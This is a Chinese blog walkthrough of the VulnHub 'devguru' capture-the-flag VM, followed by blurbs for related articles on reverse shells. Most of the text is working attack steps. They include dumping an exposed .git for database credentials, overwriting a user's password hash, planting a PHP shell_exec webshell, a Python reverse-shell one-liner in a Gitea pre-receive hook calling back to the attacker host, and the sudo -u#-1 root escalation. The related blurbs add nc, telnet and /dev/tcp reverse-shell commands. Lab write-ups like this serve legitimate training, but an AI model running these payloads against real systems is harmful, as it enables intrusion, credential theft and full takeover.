vulnhub之devguru的实践

VSole2022-07-24 18:44:07

今天实践的是vulnhub的devguru镜像,

下载地址,https://download.vulnhub.com/devguru/devguru.ova.7z,

用workstation导入成功,直接拿到地址,

进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.141,

扫描到的192.168.58.141:80/.git和http://devguru.local:8585很有用,

先用gitdumper对git进行爆破,

git clone https://github.com/arthaud/git-dumper.git,

cd git-dumper,mkdir backup,

python3 git_dumper.py http://192.168.58.141:80/.git/ backup,

cd backup,看到个adminer.php,浏览器访问一下,

继续从其它文件中获取信息,cd config,

cat database.php得到数据库访问信息,

登录后找到一个账号记录frank,

根据密码hash的特征猜测是bcrypt方式,找个在线的bcrypt站点,

给自己的密码password生成hash值,

把生成的hash值替换掉frank的密码,

就能用frank/password登录http://192.168.58.141/backend/backend/auth/signin了,登录后找到可以提交代码的页面,Code里贴上,

function onStart()

{

   $this->page["myVar"] = shell_exec($_GET['cmd']);

}

Markup里贴上,{{ this.page.myVar }},

保存后,访问http://192.168.58.141?cmd=ls试试效果,

下载一个php的反弹shell脚本,https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php,改好信息,

kali攻击机上做个http下载,python2 -m SimpleHTTPServer,

执行http://192.168.58.141?cmd=wget http://192.168.58.131:8000/php-reverse-shell.php,

kali攻击机上开个反弹shell监听,nc -lvp 4444,

访问http://192.168.58.141/php-reverse-shell.php,

kali攻击机上拿到反弹shell,不是root,先转成交互式的,

从/var/backups/app.ini.bak里发现账户信息gitea/UfFPTF8C8jjxVF2m,

再次登录http://192.168.58.141/adminer.php,再次把密码换掉,

就能用frank/password登录http://192.168.58.141:8585/user/login了,

登录后找到可以提交代码的页面,http://192.168.58.141:8585/frank/devguru-website/settings/hooks/git/pre-receive,提交代码,

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',

kali攻击机上开个反弹shell监听,nc -lvp 1234,

为了让反弹shell发生,假装编辑一下readme并提交,

kali攻击机上拿到反弹shell,sudo -l发现sqlite3是root执行的,搜一下提权方法,

最后靠sudo的版本漏洞找到最终的提权命令,

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh',id看一下是root,

shellsocket
本作品采用《CC 协议》,转载必须注明作者和本文链接
安全研究人员观察到名为 TellYouThePass 的勒索软件家族尝试利用最近发现的 Log4j 高危漏洞。TellYouThePass 勒索软件家族被认为年代比较悠久且基本不活跃,在广泛使用的 Log4j 日志框架发现漏洞之后,该勒索软件家族再次活跃。研究人员表示,继 Khonsari 勒索软件之后,TellYouThePass 成为第二个被观察到利用 Log4j 漏洞(被称为Log4Shel
反弹shell的N种姿势
2021-09-26 09:00:48
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
反弹Shell大全与原理
2023-04-25 10:15:00
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。对方主机在局域网内,从外网无法直接访问。对方主机上存在WAF,对主动连接发来的请求数据检测严格,而对向外发出的请求不进行检测或检测较少。对方由于防火墙等限制,对方机器只能发送请求,不能接收请求。在渗透测试过程中,得到webshell后一般我们会反弹shell。反弹shell原理A主机开启9090端口的tcp服务
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。centos执行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 这个payload是反向连接并且只支持Linux,Windows可以参考离别歌师傅的python windows正向连接后门。这样会把目标机的/bin/bash反弹给攻击机但是很多Linux的nc很多都是阉割版的,如果目标机器没有nc或者没有-e选项的话,不建议使用nc的方式.PHP攻击机监听nc -lvvp 4444. 要求目标机器有php然后执行php -r '$sock=fsockopen;exec;'. 加载64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。telnet反弹nc -lvvp 444 #攻击者主机上执行监听rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p #目标主机上执行。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。 nc反弹nc -lvvp portnc -e /bin/bash x.x.x.x port
反弹shell命令速查
2022-07-28 06:13:42
反弹shell命令速查
常用反弹shell方法总结
反弹shell汇总
2021-07-28 10:01:11
反弹shell汇总
反弹shell是获取Linux交互shell的一种方法,其方法背后的原理是什么呢
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。
VSole
网络安全专家